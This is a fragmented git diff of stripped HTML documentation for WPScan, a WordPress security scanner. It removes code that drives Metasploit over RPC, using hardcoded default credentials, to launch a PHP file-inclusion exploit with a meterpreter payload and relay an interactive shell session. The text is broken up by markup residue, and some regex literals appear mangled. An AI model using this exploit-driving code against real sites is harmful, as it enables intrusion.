# File lib/common_helper.rb, line 88 +# File lib/common_helper.rb, line 106 def _grep_(regexp) matches = [] self.each do |value| diff --git a/doc/Browser.html b/doc/Browser.html index d725694c..0ca3928f 100644 --- a/doc/Browser.html +++ b/doc/Browser.html @@ -111,6 +111,8 @@
*WPScan Team*
-Erwan.LR - @erwan_lr - (Project Developer) Gianluca Brindisi - @gbrindisi +
Erwan.LR - @erwan_lr - (Project Developer) Christian Mehlmauer - +@FireFart - (Project Developer) Gianluca Brindisi - @gbrindisi (Project Developer) Ryan Dewhurst - @ethicalhack3r (Project Lead)
*Other Contributors*
@@ -159,8 +168,7 @@ should be in here, email ryandewhurst at gmail. potential solutions to bugs. Callum Pember - Implemented proxy support - callumpember at gmail.com g0tmi1k - Additional timthumb checks + bug reports. Melvin Lammerts - Reported a couple of fake vulnerabilities - -melvin at 12k.nl Christian Mehlmauer - @FireFart - Theme -enumeration Paolo Perego - @thesp0nge - Basic authentification +melvin at 12k.nl Paolo Perego - @thesp0nge - Basic authentificationThis library should contain all methods for exploitation.
- -# File lib/wpscan/exploit.rb, line 27 -def initialize(wp_url, type, uri, postdata, use_proxy, proxy_addr, proxy_port) - @wp_url = URI.parse(wp_url.to_s) - @rhost = @wp_url.host - @path = @wp_url.path - @type = type - @uri = uri - @postdata = postdata - @session_in_use = nil - @use_proxy = use_proxy - @proxy_addr = proxy_addr - @proxy_port = proxy_port - start() -end-
if there is more than 1 session, allow the user to choose one.
- - - -# File lib/wpscan/exploit.rb, line 148 -def choose_session() - if session_count() >= 2 - puts "[?] We have " + session_count().to_s + " sessions running. Please choose one by id." - open_sessions = "" - sessions.keys.each do |open_session| - open_sessions += open_session.to_s + " " - end - puts open_sessions - use_session = Readline.readline - puts "Using session " + use_session.to_s - @session_in_use = use_session - else - puts "Using session " + last_session_id().to_s - @session_in_use = last_session_id() - end -end-
exploit
- - - -# File lib/wpscan/exploit.rb, line 61 -def exploit(msf_module, payload) - - exploit_info(msf_module,payload) - - if @postdata == "" - result = RpcClient.new.exploit(msf_module, {:RHOST => @rhost,:PATH => @path,:PHPURI => @uri,:PAYLOAD => payload}) - else - result = RpcClient.new.exploit(msf_module, {:RHOST => @rhost,:PATH => @path,:PHPURI => @uri,:POSTDATA => @postdata, :PAYLOAD => payload}) - end - - if result['result'] == "success" - puts "[*] Exploit worked! Waiting for a session..." - - session_spawn_timer = Time.new - while sessions.nil? or sessions.empty? - # wait for a session to spawn with a timeout of 1 minute - if Time.now - session_spawn_timer > 60 - puts "[ERROR] Session was not created... exiting." - return false - end - end - - choose_session() - - input = nil - while input.nil? - puts meterpreter_read(last_session_id()) - input = Readline.readline - if input == "exit" - kill_session(@session_in_use) - return false - end - meterpreter_write(last_session_id(), input) - input = nil - end - - else - puts "[ERROR] Exploit failed! :(" - return false - end -end-
output our exploit data
- - - -# File lib/wpscan/exploit.rb, line 105 -def exploit_info(msf_module,payload) - info = RpcClient.new.get_exploit_info(msf_module) - puts - puts "| [EXPLOIT]" - puts "| Name: " + info['name'] - puts "| Description: " + info['description'].gsub!("\t", "").gsub!("\n\n","\n").gsub!("\n", "\n| ").chop! - puts "| [OPTIONS]" - puts "| RHOST: " + @rhost - puts "| PATH: " + @path - puts "| URI: " + uri - puts "| POSTDATA: " + @postdata if @postdata != "" - puts "| Payload: " + payload - puts -end-
not sure if this is needed?! not used.
- - - -# File lib/wpscan/exploit.rb, line 122 -def job_id() - jobs = RpcClient.new.jobs() - puts jobs -end-
kill a session by session id
- - - -# File lib/wpscan/exploit.rb, line 167 -def kill_session(id) - begin - killed = RpcClient.new.kill_session(id) - if killed['result'] == "success" - puts "[-] Session " + id.to_s + " killed." - end - rescue - puts "[] Session " + id.to_s + " does not exist." - return false - end -end-
the last active session id created
- - - -# File lib/wpscan/exploit.rb, line 135 -def last_session_id() - sessions.keys.last -end-
read data from a meterpreter session data must be base64 decoded.
- - - -# File lib/wpscan/exploit.rb, line 196 -def meterpreter_read(id) - Base64.decode64(RpcClient.new.meterpreter_read(id)['data']) -end-
write data to a meterpreter session data must be base64 encoded.
- - - -# File lib/wpscan/exploit.rb, line 203 -def meterpreter_write(id, data) - RpcClient.new.meterpreter_write(id, Base64.encode64(data)) -end-
read data from a shell, meterpreter is not classed as a shell.
- - - -# File lib/wpscan/exploit.rb, line 182 -def read_shell(id) - RpcClient.new.read_shell(id)['data'] -end-
a count of the amount of active sessions
- - - -# File lib/wpscan/exploit.rb, line 141 -def session_count() - sessions().size -end-
all sessions and related session data
- - - -# File lib/wpscan/exploit.rb, line 129 -def sessions() - sessions = RpcClient.new.sessions() -end-
figure out what to exploit
- - - -# File lib/wpscan/exploit.rb, line 43 -def start() - if @type == "RFI" - puts - puts "[?] Exploit? [y/n]" - answer = Readline.readline - if answer =~ %r^y/ - msf_module = "exploit/unix/webapp/php_include" - payload = "php/meterpreter/bind_tcp" - exploit(msf_module, payload) - else - return false - end - elsif @type == "SQLI" - end -end-
write data to a shell, meterpreter is not classed as a shell.
- - - -# File lib/wpscan/exploit.rb, line 189 -def write_shell(id, data) - RpcClient.new.write_shell(id, data) -end-
This tool generates a list to use for plugin and theme enumeration
- -type = themes | plugins
- - - -# File lib/wpstools/generate_list.rb, line 27 -def initialize(type, verbose) - if type =~ %rplugins/ - @type = "plugin" - @svn_url = "http://plugins.svn.wordpress.org/" - @popular_url = "http://wordpress.org/extend/plugins/browse/popular/" - @popular_regex = %r{<h3><a href="http://wordpress.org/extend/plugins/(.+)/">.+</a></h3>} - elsif type =~ %rthemes/ - @type = "theme" - @svn_url = "http://themes.svn.wordpress.org/" - @popular_url = "http://wordpress.org/extend/themes/browse/popular/" - @popular_regex = %r{<h3><a href="http://wordpress.org/extend/themes/(.+)">.+</a></h3>} - else - raise "Type #{type} not defined" - end - @verbose = verbose - @browser = Browser.instance - @hydra = @browser.hydra -end-
# File lib/wpstools/generate_list.rb, line 71 -def generate_full_list - set_file_name(:full) - items = Svn_Parser.new(@svn_url, @verbose).parse - save items -end-
# File lib/wpstools/generate_list.rb, line 77 -def generate_popular_list(pages) - set_file_name(:popular) - popular = get_popular_items(pages) - items = Svn_Parser.new(@svn_url, @verbose).parse(popular) - save items -end-
Send a HTTP request to the WordPress most popular theme or plugin webpage -parse the response for the names.
- - - -# File lib/wpstools/generate_list.rb, line 86 -def get_popular_items(pages) - found_items = [] - page_count = 1 - queue_count = 0 - - (1...(pages.to_i+1)).each do |page| - # First page has another URL - url = (page == 1) ? @popular_url : @popular_url + 'page/' + page.to_s + '/' - request = @browser.forge_request(url) - - queue_count += 1 - - request.on_complete do |response| - puts "[+] Parsing page " + page_count.to_s if @verbose - page_count += 1 - response.body.scan(@popular_regex).each do |item| - puts "[+] Found popular #@type: #{item}" if @verbose - found_items << item[0] - end - end - - @hydra.queue(request) - - if queue_count == @browser.max_threads - @hydra.run - queue_count = 0 - end - - end - - @hydra.run - - found_items.sort! - found_items.uniq -end-
Save the file
- - - -# File lib/wpstools/generate_list.rb, line 123 -def save(items) - items.sort! - items.uniq! - puts "[*] We have parsed #{items.length} #@types" - File.open(@file_name, 'w') { |f| f.puts(items) } - puts "New #@file_name file created" -end-
# File lib/wpstools/generate_list.rb, line 46 -def set_file_name(type) - case @type - when "plugin" - case type - when :full - @file_name = DATA_DIR + "/plugins_full.txt" - when :popular - @file_name = DATA_DIR + "/plugins.txt" - else - raise "Unknown type" - end - when "theme" - case type - when :full - @file_name = DATA_DIR + "/themes_full.txt" - when :popular - @file_name = DATA_DIR + "/themes.txt" - else - raise "Unknown type" - end - else - raise "Unknown type #@type" - end -end-
# File lib/updater/git_updater.rb, line 37 +def has_local_changes? + %x[git #{repo_directory_arguments()} diff --exit-code 2>&1] =~ %rdiff/ ? true : false +end+
# File lib/updater/git_updater.rb, line 41 +def reset_head + %x[git #{repo_directory_arguments()} reset --hard HEAD] +end+
# File lib/updater/git_updater.rb, line 38 +# File lib/updater/git_updater.rb, line 46 def repo_directory_arguments if @repo_directory return "--git-dir=\"#{@repo_directory}/.git\" --work-tree=\"#{@repo_directory}\"" diff --git a/doc/Malwares.html b/doc/Malwares.html index 7cee2845..2cf2d304 100644 --- a/doc/Malwares.html +++ b/doc/Malwares.html @@ -89,6 +89,8 @@
Plugins directories
+ +Data files
+ + +# File lib/common_helper.rb, line 42 +# File lib/common_helper.rb, line 60 def add_http_protocol(url) url =~ %r^https?:/ ? url : "http://#{url}" end@@ -324,7 +399,7 @@-# File lib/common_helper.rb, line 46 +# File lib/common_helper.rb, line 64 def add_trailing_slash(url) url =~ %r\/$/ ? url : "#{url}/" end@@ -354,7 +429,7 @@-# File lib/common_helper.rb, line 112 +# File lib/common_helper.rb, line 130 def banner() puts '____________________________________________________' puts " __ _______ _____ " @@ -399,7 +474,7 @@-# File lib/common_helper.rb, line 131 +# File lib/common_helper.rb, line 149 def colorize(text, color_code) "\e[#{color_code}m#{text}\e[0m" end@@ -429,7 +504,7 @@-+# File lib/common_helper.rb, line 51 +# File lib/common_helper.rb, line 69 def get_equal_string_end(stringarray = [""]) already_found = "" looping = true @@ -463,6 +538,38 @@+ ++ ++ get_metasploit_url(module_path) + click to toggle source ++ + ++ + + + + ++ + + + +++ +# File lib/common_helper.rb, line 161 +def get_metasploit_url(module_path) + # remove leading slash + module_path = module_path.sub(%r^\//, "") + "http://www.metasploit.com/modules/#{module_path}" +end+@@ -479,7 +586,7 @@-+# File lib/common_helper.rb, line 139 +# File lib/common_helper.rb, line 157 def green(text) colorize(text, 32) end@@ -560,6 +667,80 @@+ ++ + ++ output_vulnerabilities(vulns) + click to toggle source ++ + ++ + + + + ++ + + + +++ +# File wpscan.rb, line 24 +def output_vulnerabilities(vulns) + vulns.each do |vulnerability| + puts + puts " | " + red("* Title: #{vulnerability.title}") + vulnerability.references.each do |r| + puts " | " + red("* Reference: #{r}") + end + vulnerability.metasploit_modules.each do |m| + puts " | " + red("* Metasploit module: #{get_metasploit_url(m)}") + end + end +end++ ++ ++ puts(o = "") + click to toggle source ++ + ++ ++ + + + +Override for puts to enable logging
+ + + +++ +# File lib/common_helper.rb, line 168 +def puts(o = "") + # remove color for logging + if o.respond_to?("gsub") + temp = o.gsub(%r\e\[\d+m(.*)?\e\[0m/, '\1') + File.open(LOG_FILE, "a+") { |f| f.puts(temp) } + end + super(o) +end+@@ -576,7 +757,7 @@-# File lib/common_helper.rb, line 135 +# File lib/common_helper.rb, line 153 def red(text) colorize(text, 31) end@@ -606,7 +787,7 @@-# File lib/common_helper.rb, line 33 +# File lib/common_helper.rb, line 48 def require_files_from_directory(absolute_dir_path, files_pattern = "*.rb") Dir[File.join(absolute_dir_path, files_pattern)].sort.each do |f| f = File.expand_path(f) diff --git a/doc/README.html b/doc/README.html index 6684563b..67c960b9 100644 --- a/doc/README.html +++ b/doc/README.html @@ -55,6 +55,8 @@README + log + @@ -71,22 +73,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater @@ -156,8 +164,7 @@ LICENSE==
-WPScan - WordPress Security Scanner Copyright (C) 2011-2012 Ryan Dewhurst -AKA ethicalhack3r
+WPScan - WordPress Security Scanner Copyright (C) 2011-2013 The WPScan Team
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free @@ -205,6 +212,18 @@ href="http://www.gnu.org/licenses/">www.gnu.org/licenses/>.
cd wpscan sudo gem install bundler && bundle install --without test development +-> Installing on Archlinux: + + pacman -Sy ruby + pacman -Sy libyaml + + git clone https:/%rgithub.com/wpscanteam/wpscan.git + cd wpscan + sudo gem install bundler && bundle install --without test development + + gem install typhoeus + gem install nokogiri + -> Installing on Mac OS X: git clone https:/%rgithub.com/wpscanteam/wpscan.git diff --git a/doc/RpcClient.html b/doc/RpcClient.html deleted file mode 100644 index a76bf81b..00000000 --- a/doc/RpcClient.html +++ /dev/null @@ -1,708 +0,0 @@ - - - - - - -class RpcClient - RDoc Documentation - - - - - - - - - - - - - - - - --- - - - diff --git a/doc/SvnUpdater.html b/doc/SvnUpdater.html index e20c2e27..aebd536e 100644 --- a/doc/SvnUpdater.html +++ b/doc/SvnUpdater.html @@ -93,6 +93,8 @@class RpcClient
- -- -- - - - -This library should contain all methods to communicate with msfrpc. See -framework/documentation/msfrpc.txt for further information. msfrpcd -S -U -wpscan -P wpscan -f -t Web -u /RPC2 name = exploit/unix/webapp/php_include
- -- - - - - - - - - - - - -- - -Public Class Methods
- - -- -- - -- new() - click to toggle source -- - -- - - - - -- - - - --- -# File lib/wpscan/msfrpc_client.rb, line 28 -def initialize - @config = {} - @config['host'] = "127.0.0.1" - @config['path'] = "/RPC2" - @config['port'] = 55553 - @config['user'] = "wpscan" - @config['pass'] = "wpscan" - @auth_token = nil - @last_auth = nil - - begin - @server = XMLRPC::Client.new3( :host => @config["host"], :path => @config["path"], :port => @config["port"], :user => @config["user"], :password => @config["pass"]) - rescue => e - puts "[ERROR] Could not create XMLRPC object." - puts e.faultCode - puts e.faultString - end -end-- - -Public Instance Methods
- - -- -- - -- authenticate() - click to toggle source -- - -- -- - - - -check authentication
- - - --- -# File lib/wpscan/msfrpc_client.rb, line 65 -def authenticate() - login() if @auth_token.nil? - login() if (Time.now - @last_auth > 600) -end-- -- - -- exploit(name, opts) - click to toggle source -- - -- -- - - - -execute exploit
- - - --- -# File lib/wpscan/msfrpc_client.rb, line 93 -def exploit(name, opts) - authenticate() - @server.call('module.execute', @auth_token, 'exploit', name, opts) -end-- -- - -- get_exploit_info(name) - click to toggle source -- - -- -- - - - -retrieve information about the exploit
- - - --- -# File lib/wpscan/msfrpc_client.rb, line 72 -def get_exploit_info(name) - authenticate() - @server.call('module.info', @auth_token, 'exploit', name) -end-- -- - -- get_options(name) - click to toggle source -- - -- -- - - - -retrieve exploit options
- - - --- -# File lib/wpscan/msfrpc_client.rb, line 79 -def get_options(name) - authenticate() - @server.call('module.options', @auth_token, 'exploit',name) -end-- -- - -- get_payloads(name) - click to toggle source -- - -- -- - - - -retrieve the exploit payloads
- - - --- -# File lib/wpscan/msfrpc_client.rb, line 86 -def get_payloads(name) - authenticate() - @server.call('module.compatible_payloads', @auth_token, name) -end-- -- - -- jobs() - click to toggle source -- - -- -- - - - -list msf jobs
- - - --- -# File lib/wpscan/msfrpc_client.rb, line 100 -def jobs() - authenticate() - @server.call('job.list', @auth_token) -end-- -- - -- kill_session(id) - click to toggle source -- - -- -- - - - -kill msf session
- - - --- -# File lib/wpscan/msfrpc_client.rb, line 114 -def kill_session(id) - authenticate() - @server.call('session.stop', @auth_token, id) -end-- -- - -- login() - click to toggle source -- - -- -- - - - -login to msfrpcd
- - - --- -# File lib/wpscan/msfrpc_client.rb, line 49 -def login() - result = @server.call("auth.login", @config['user'], @config['pass']) - - if result['result'] == "success" - @auth_token = result['token'] - @last_auth = Time.new - logged_in = true - else - puts "[ERROR] Invalid login credentials provided to msfrpcd." - logged_in = false - end - -end-- -- - -- meterpreter_read(id) - click to toggle source -- - -- - - - - -- - - - --- -# File lib/wpscan/msfrpc_client.rb, line 133 -def meterpreter_read(id) - authenticate() - @server.call('session.meterpreter_read', @auth_token, id) -end-- -- - -- meterpreter_write(id, data) - click to toggle source -- - -- - - - - -- - - - --- -# File lib/wpscan/msfrpc_client.rb, line 138 -def meterpreter_write(id, data) - authenticate() - @server.call('session.meterpreter_write', @auth_token, id, data) -end-- -- - -- read_shell(id) - click to toggle source -- - -- -- - - - -reads any pending output from session
- - - --- -# File lib/wpscan/msfrpc_client.rb, line 121 -def read_shell(id) - authenticate() - @server.call('session.shell_read', @auth_token, id) -end-- -- - -- sessions() - click to toggle source -- - -- -- - - - -list msf sessions
- - - --- -# File lib/wpscan/msfrpc_client.rb, line 107 -def sessions() - authenticate() - @server.call('session.list', @auth_token) -end-- -- - -- write_shell(id, data) - click to toggle source -- - -- -- - - - -writes the specified input into the session
- - - --- -# File lib/wpscan/msfrpc_client.rb, line 128 -def write_shell(id, data) - authenticate() - @server.call('session.shell_write', @auth_token, id, data) -end-README + log + @@ -109,22 +111,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater diff --git a/doc/Svn_Parser.html b/doc/Svn_Parser.html deleted file mode 100644 index 190013c2..00000000 --- a/doc/Svn_Parser.html +++ /dev/null @@ -1,339 +0,0 @@ - - - - - - - class Svn_Parser - RDoc Documentation - - - - - - - - - - - - - - - - --- - - - diff --git a/doc/URI.html b/doc/URI.html index 6c4ed92e..4bc1f42e 100644 --- a/doc/URI.html +++ b/doc/URI.html @@ -83,6 +83,8 @@class Svn_Parser
- -- -- - - - -This Class Parses SVN Repositories via HTTP
- -- - - - - - - - - - -- - - - - -Attributes
- - --- -- keep_empty_dirs[RW] -- -- - - ---- -- svn_root[RW] -- -- - - ---- -- verbose[RW] -- -- - - --- - -Public Class Methods
- - -- -- - -- new(svn_root, verbose, keep_empty_dirs = false) - click to toggle source -- - -- - - - - -- - - - --- -# File lib/wpstools/parse_svn.rb, line 26 -def initialize(svn_root, verbose, keep_empty_dirs = false) - @svn_root = svn_root - @verbose = verbose - @keep_empty_dirs = keep_empty_dirs - @svn_browser = Browser.instance - @svn_hydra = @svn_browser.hydra -end-- - -Public Instance Methods
- - -- -- - -- parse(dirs=nil) - click to toggle source -- - -- - - - - -- - - - --- -# File lib/wpstools/parse_svn.rb, line 34 -def parse(dirs=nil) - if dirs == nil - dirs = get_root_directories - end - urls = get_svn_project_urls(dirs) - get_svn_file_entries(urls) -end-README + log + @@ -99,22 +101,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater @@ -210,7 +218,7 @@ -diff --git a/doc/UpdaterFactory.html b/doc/UpdaterFactory.html index 4417e666..6958e0fc 100644 --- a/doc/UpdaterFactory.html +++ b/doc/UpdaterFactory.html @@ -91,6 +91,8 @@# File lib/common_helper.rb, line 79 +# File lib/common_helper.rb, line 97 def self.escape(str) URI.encode_www_form_component(str).gsub("+", "%20") enddiff --git a/doc/Updater.html b/doc/Updater.html index 6fc2d033..a2658a82 100644 --- a/doc/Updater.html +++ b/doc/Updater.html @@ -76,8 +76,6 @@#local_revision_number - #raise_must_be_implemented - #update @@ -97,6 +95,8 @@ README + log + @@ -113,22 +113,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater @@ -286,7 +292,7 @@ not present @@ -316,7 +322,7 @@ not present# File lib/updater/updater.rb, line 29 def is_installed? - raise_must_be_implemented() + raise NotImplementedError end@@ -346,7 +352,7 @@ not present# File lib/updater/updater.rb, line 33 def local_revision_number - raise_must_be_implemented() + raise NotImplementedError end@@ -360,42 +366,6 @@ not present -# File lib/updater/updater.rb, line 37 def update - raise_must_be_implemented() + raise NotImplementedError end- -Protected Instance Methods
- - -- -- - -- raise_must_be_implemented() - click to toggle source -- - -- - - - - -- - - - --- -# File lib/updater/updater.rb, line 43 -def raise_must_be_implemented - raise "The method must be implemented" -end-README + log + @@ -107,22 +109,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater diff --git a/doc/Vulnerable.html b/doc/Vulnerable.html index 9cb883b6..39b01b8a 100644 --- a/doc/Vulnerable.html +++ b/doc/Vulnerable.html @@ -89,6 +89,8 @@ README + log + @@ -105,22 +107,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater @@ -262,7 +270,8 @@ be empty) vulnerabilities << WpVulnerability.new( node.search("title").text, node.search("reference").map(&:text), - node.search("type").text + node.search("type").text, + node.search("metasploit").map(&:text) ) end vulnerabilities diff --git a/doc/WebSite.html b/doc/WebSite.html index 909aec0c..21fc718d 100644 --- a/doc/WebSite.html +++ b/doc/WebSite.html @@ -101,6 +101,8 @@ README + log + @@ -117,22 +119,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater @@ -228,7 +236,7 @@ -# File lib/wpscan/modules/web_site.rb, line 88 +# File lib/wpscan/modules/web_site.rb, line 94 def self.page_hash(url) Digest::MD5.hexdigest(Browser.instance.get(url).body) end@@ -264,7 +272,7 @@-# File lib/wpscan/modules/web_site.rb, line 100 +# File lib/wpscan/modules/web_site.rb, line 106 def error_404_hash unless @error_404_hash non_existant_page = Digest::MD5.hexdigest(rand(9999999999).to_s) + ".html" @@ -358,7 +366,7 @@-# File lib/wpscan/modules/web_site.rb, line 92 +# File lib/wpscan/modules/web_site.rb, line 98 def homepage_hash unless @homepage_hash @homepage_hash = WebSite.page_hash(@uri.to_s) @@ -416,13 +424,13 @@-see if the remote url returns 30x redirect return a string with the -redirection or nil
+See if the remote url returns 30x redirect This method is recursive Return +a string with the redirection or nil
-# File lib/wpscan/modules/web_site.rb, line 75 +# File lib/wpscan/modules/web_site.rb, line 76 def redirection(url = nil) redirection = nil url ||= @uri.to_s @@ -430,6 +438,11 @@ redirection or nil if response.code == 301 || response.code == 302 redirection = response.headers_hash['location'] + + # Let's check if there is a redirection in the redirection + if other_redirection = redirection(redirection) + redirection = other_redirection + end end redirection @@ -461,7 +474,7 @@ returned-# File lib/wpscan/modules/web_site.rb, line 110 +# File lib/wpscan/modules/web_site.rb, line 116 def rss_url homepage_body = Browser.instance.get(@uri.to_s).body homepage_body[%r{<link .* type="application/rss\+xml" .* href="([^"]+)" />}, 1] diff --git a/doc/WpConfigBackup.html b/doc/WpConfigBackup.html index 1487b6f0..4538a0ac 100644 --- a/doc/WpConfigBackup.html +++ b/doc/WpConfigBackup.html @@ -85,6 +85,8 @@README + log + @@ -101,22 +103,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater diff --git a/doc/WpDetector.html b/doc/WpDetector.html index a375aa9a..60dfeefa 100644 --- a/doc/WpDetector.html +++ b/doc/WpDetector.html @@ -91,6 +91,8 @@ README + log + @@ -107,22 +109,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater diff --git a/doc/WpEnumerator.html b/doc/WpEnumerator.html index 6a74d375..b8a53df9 100644 --- a/doc/WpEnumerator.html +++ b/doc/WpEnumerator.html @@ -91,6 +91,8 @@ README + log + @@ -107,22 +109,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater @@ -345,11 +353,12 @@ # Open and parse the 'most popular' plugin list... File.open(file, "r") do |f| f.readlines.collect do |line| + l = line.strip targets_url << WpItem.new( :base_url => url, - :path => line.strip, + :path => l, :wp_content_dir => wp_content_dir, - :name => File.dirname(line.strip), + :name => l =~ %r.+\/.+/ ? File.dirname(l) : l.sub(%r\/$/, ""), :vulns_file => vulns_file, :type => type, :wp_plugins_dir => plugins_dir diff --git a/doc/WpFullPathDisclosure.html b/doc/WpFullPathDisclosure.html index 4e71d706..f8b2a091 100644 --- a/doc/WpFullPathDisclosure.html +++ b/doc/WpFullPathDisclosure.html @@ -85,6 +85,8 @@ README + log + @@ -101,22 +103,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater diff --git a/doc/WpItem.html b/doc/WpItem.html index 3f7fda58..3a077536 100644 --- a/doc/WpItem.html +++ b/doc/WpItem.html @@ -100,6 +100,8 @@ #version + #wp_org_item? + #wp_org_url @@ -119,6 +121,8 @@ README + log + @@ -135,22 +139,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater @@ -407,7 +417,7 @@ -# File lib/wpscan/wp_item.rb, line 128 +# File lib/wpscan/wp_item.rb, line 149 def <=>(other) other.name <=> self.name end@@ -437,7 +447,7 @@-# File lib/wpscan/wp_item.rb, line 118 +# File lib/wpscan/wp_item.rb, line 139 def ==(other) other.name == self.name end@@ -467,7 +477,7 @@-# File lib/wpscan/wp_item.rb, line 123 +# File lib/wpscan/wp_item.rb, line 144 def ===(other) other.name == self.name end@@ -497,7 +507,7 @@-# File lib/wpscan/wp_item.rb, line 138 +# File lib/wpscan/wp_item.rb, line 159 def changelog_url get_url_without_filename.merge("changelog.txt") end@@ -527,7 +537,7 @@-# File lib/wpscan/wp_item.rb, line 101 +# File lib/wpscan/wp_item.rb, line 122 def directory_listing? # Need to remove to file part from the url Browser.instance.get(get_url_without_filename).body[%r{<title>Index of}] ? true : false @@ -558,7 +568,7 @@-# File lib/wpscan/wp_item.rb, line 107 +# File lib/wpscan/wp_item.rb, line 128 def extract_name_from_url get_full_url.to_s[%r{^(https?://.*/([^/]+)/)}, 2] end@@ -588,7 +598,7 @@-# File lib/wpscan/wp_item.rb, line 63 +# File lib/wpscan/wp_item.rb, line 84 def get_full_url url = @base_url.to_s.end_with?("/") ? @base_url.to_s : "#@base_url/" # remove first and last / @@ -632,7 +642,7 @@-# File lib/wpscan/wp_item.rb, line 49 +# File lib/wpscan/wp_item.rb, line 70 def get_sub_folder case @type when "themes" @@ -671,7 +681,7 @@-# File lib/wpscan/wp_item.rb, line 82 +# File lib/wpscan/wp_item.rb, line 103 def get_url_without_filename location_url = get_full_url.to_s valid_location_url = location_url[%r{^(https?://.*/)[^.]+\.[^/]+$}, 1] @@ -706,7 +716,7 @@-# File lib/wpscan/wp_item.rb, line 152 +# File lib/wpscan/wp_item.rb, line 173 def has_changelog? unless @changelog status = Browser.instance.get(changelog_url).code @@ -740,7 +750,7 @@-# File lib/wpscan/wp_item.rb, line 143 +# File lib/wpscan/wp_item.rb, line 164 def has_readme? unless @readme status = Browser.instance.get(readme_url).code @@ -774,7 +784,7 @@-# File lib/wpscan/wp_item.rb, line 133 +# File lib/wpscan/wp_item.rb, line 154 def readme_url get_url_without_filename.merge("readme.txt") end@@ -804,7 +814,7 @@-# File lib/wpscan/wp_item.rb, line 112 +# File lib/wpscan/wp_item.rb, line 133 def to_s item_version = version "#@name#{' v' + item_version.strip if item_version}" @@ -835,7 +845,7 @@-+# File lib/wpscan/wp_item.rb, line 92 +# File lib/wpscan/wp_item.rb, line 113 def version unless @version response = Browser.instance.get(get_full_url.merge("readme.txt").to_s) @@ -853,6 +863,45 @@+ ++ ++ wp_org_item?() + click to toggle source ++ + ++ ++ + + + +returns true if this theme or plugin is hosted on wordpress.org
+ + + +++ +# File lib/wpscan/wp_item.rb, line 57 +def wp_org_item? + case @type + when "themes" + file = THEMES_FULL_FILE + when "plugins" + file = PLUGINS_FULL_FILE + else + raise("Unknown type #@type") + end + f = File.readlines(file).grep(%r^#{Regexp.escape(@name)}$/) + f.empty? ? false : true +end+@@ -872,7 +921,14 @@ href="https://github.com/wpscanteam/wpscan/issues/100">github.com/wpscanteam/wpsdiff --git a/doc/WpLoginProtection.html b/doc/WpLoginProtection.html index 4499e066..42c56bf1 100644 --- a/doc/WpLoginProtection.html +++ b/doc/WpLoginProtection.html @@ -109,6 +109,8 @@# File lib/wpscan/wp_item.rb, line 45 def wp_org_url - URI('http://wordpress.org/extend/plugins/').merge("#@name/") + case @type + when "themes" + return URI("http://wordpress.org/extend/themes/").merge("#@name/") + when "plugins" + return URI("http://wordpress.org/extend/plugins/").merge("#@name/") + else + raise("No Wordpress URL for #@type") + end endREADME + log + @@ -125,22 +127,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater diff --git a/doc/WpOptions.html b/doc/WpOptions.html index 77dc0a43..504723c6 100644 --- a/doc/WpOptions.html +++ b/doc/WpOptions.html @@ -89,6 +89,8 @@ README + log + @@ -105,22 +107,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater diff --git a/doc/WpPlugin.html b/doc/WpPlugin.html index 274ff07f..b60cb00a 100644 --- a/doc/WpPlugin.html +++ b/doc/WpPlugin.html @@ -93,6 +93,8 @@ README + log + @@ -109,22 +111,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + 